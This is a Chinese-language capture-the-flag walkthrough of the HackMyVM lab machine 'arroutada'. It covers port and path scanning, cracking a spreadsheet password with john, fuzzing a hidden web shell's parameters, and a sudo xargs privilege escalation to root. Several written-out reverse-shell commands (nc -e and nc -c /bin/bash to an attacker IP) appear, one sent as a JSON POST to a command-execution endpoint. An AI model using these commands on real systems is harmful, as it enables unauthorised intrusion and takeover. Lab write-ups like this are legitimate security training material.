信息搜集

主机扫描

arp-scan -l

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn  192.168.137.6  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-06 11:21 EDT
Nmap scan report for 192.168.137.6
Host is up (0.00061s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
MAC Address: 08:00:27:5F:16:62 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.29 seconds

路径扫描

payload:
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -t 100 -b 403,404 -x php,*  -u http://192.168.137.6  
/imgs                 (Status: 301) [Size: 313] [--> http://192.168.137.6/imgs/]
/scout                (Status: 301) [Size: 314] [--> http://192.168.137.6/scout/]

提示我们还有一个路径,但不知道是哪一个

┌──(root㉿kali)-[~]
└─# wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirb/big.txt -u "http://192.168.137.6/scout/FUZZ/docs/"  --hl 3 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.137.6/scout/FUZZ/docs/
Total requests: 20469

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                       
=====================================================================

000000015:   403        9 L      28 W       278 Ch      ".htaccess"                                                                                                   
000000016:   403        9 L      28 W       278 Ch      ".htpasswd"                                                                                                   
000009969:   200        1016 L   12059 W    189767 Ch   "j2"                                                                                                          

Total time: 9.932512
Processed Requests: 20469
Filtered Requests: 20466
Requests/sec.: 2060.807

发现一个pass.txt

发现一个ods文件,和一个z206文件:

Ignore z*, please
Jabatito

于是我们发现表格被加密了,于是我们准备破解密码,需要用到一个工具,说来也是,搜索了一会儿找到

libreoffice2john shellfile.ods > hash
┌──(root㉿kali)-[/home/kali/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (ODF, OpenDocument Star/Libre/OpenOffice [PBKDF2-SHA1 128/128 SSE2 4x BF/AES])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (crypto [0=Blowfish 1=AES]) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
john11           (shellfile.ods)     
1g 0:00:02:27 DONE (2024-05-06 12:09) 0.006773g/s 111.9p/s 111.9c/s 111.9C/s jolly..iloveyou18
Use the "--show --format=ODF" options to display all of the cracked passwords reliably
Session completed. 

我们打开excel发现一个路径解锁和删除 ODS (OpenOffice / LibreOffice calc) 密码 (aspose.app)

 /thejabasshell.php

进去之后什么都没有,空白页面,这不禁让我想起了靶场meidusa,需要我们爆破参数

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://192.168.137.6/thejabasshell.php?FUZZ=whoami -fw 1

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.137.6/thejabasshell.php?FUZZ=whoami
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

a                       [Status: 200, Size: 33, Words: 5, Lines: 1, Duration: 1ms]
:: Progress: [26584/26584] :: Job [1/1] :: 3278 req/sec :: Duration: [0:00:08] :: Errors: 2 ::

我们发现还有一个参数,于是我们在fuzz一下

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ffuf -w /usr/share/wordlists/rockyou.txt -u 'http://192.168.137.6/thejabasshell.php?a=whoami&b=FUZZ'  -fw 5 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.137.6/thejabasshell.php?a=whoami&b=FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/rockyou.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 5
________________________________________________

pass                    [Status: 200, Size: 9, Words: 1, Lines: 2, Duration: 65ms]

拿取shell

192.168.137.6/thejabasshell.php?a=nc -e /bin/bash 192.168.137.205 1234&b=pass

获取www-data权限,发现有一个用户还需要再提权

  1. sudo -l 权限不够
  2. 无定时文件
  3. 无可利用suid命令:find / -perm -u=s -type f 2>/dev/null
  4. 无可用文件:/usr/sbin/getcap -r / 2>/dev/null
  5. 查看端口: ss -altp 发现本机还有运行一个网站服务开始信息搜集一下

利用wget现将文件下载下来,然后看

1.index.html

wget http://127.0.0.1:8000 获取index.html
有一串briainfuck编码
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>---.+++++++++++..<<++.>++.>-----------.++.++++++++.<+++++.>++++++++++++++.<+++++++++.---------.<.>>-----------------.-------.++.++++++++.------.+++++++++++++.+.<<+..

解密:all HackMyVM hackers!!
<!-- Please sanitize /priv.php -->

提示我们还有一个文件,下载访问:

www-data@arroutada:/tmp$ cat priv.php
cat priv.php
Error: the "command" parameter is not specified in the request body.

/*

$json = file_get_contents('php://input');
$data = json_decode($json, true);

if (isset($data['command'])) {
    system($data['command']);
} else {
    echo 'Error: the "command" parameter is not specified in the request body.';
}

*/

上面脚本意味着存在命令执行,需要我们将参数以json的方式传送出去

wget --post-data='{"command":"nc -c /bin/bash 192.168.137.205 6666"}' http://127.0.0.1:8000/priv.php

成功获取用户权限

user.txt:785f64437c6e1f9af6aa1afcc91ed27c

提权

接下来拿取root用户

sodo -l 发现xargs具有超级权限

sudo xargs -a /dev/null sh
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
cat root.txt
R3VuYXhmR2JGenlOYXFOeXlVbnB4WmxJWg==
base64+rot13
ThanksToSmlAndAllHackMyVM

知识点

  1. ffuf与wfuzz的使用
  2. wget的post用法,wget可以下载的同时,使用post参数注入,本靶机是因为文件存在命令执行漏洞
  3. nc -e 的用法与bash的区别
  4. 第一次遇到只有一个端口的服务器,还是非常有意思的。